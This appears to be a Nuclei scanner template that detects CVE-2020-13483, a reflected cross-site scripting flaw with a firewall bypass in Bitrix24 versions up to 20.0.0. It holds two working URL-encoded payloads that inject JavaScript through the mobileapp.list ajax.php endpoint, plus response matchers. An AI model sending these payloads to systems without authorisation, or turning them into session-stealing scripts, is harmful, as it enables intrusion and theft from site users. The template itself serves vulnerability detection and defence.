id: CVE-2020-13483 info: name: Bitrix24 <=20.0.0 - Cross-Site Scripting author: pikpikcu,3th1c_yuk1 severity: medium description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability. reference: - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 - https://twitter.com/brutelogic/status/1483073170827628547 - https://nvd.nist.gov/vuln/detail/CVE-2020-13483 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 epss-percentile: 0.44613 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bitrix24 product: bitrix24 tags: cve2020,cve,xss,bitrix,bitrix24 http: - method: GET path: - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>' - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '*/)});function __MobileAppList(){alert(1)}//' - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" condition: or - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502202a2a07e609f8caed685b761ba01951c30fa18263d434c61f9e3a4e22ca861e41022100fa70983fe24c6aab2c9b4f3be6a814c578bf2f453df7b94a8ee3674f2a4b8db0:922c64590222798bb761d5b6d8e72950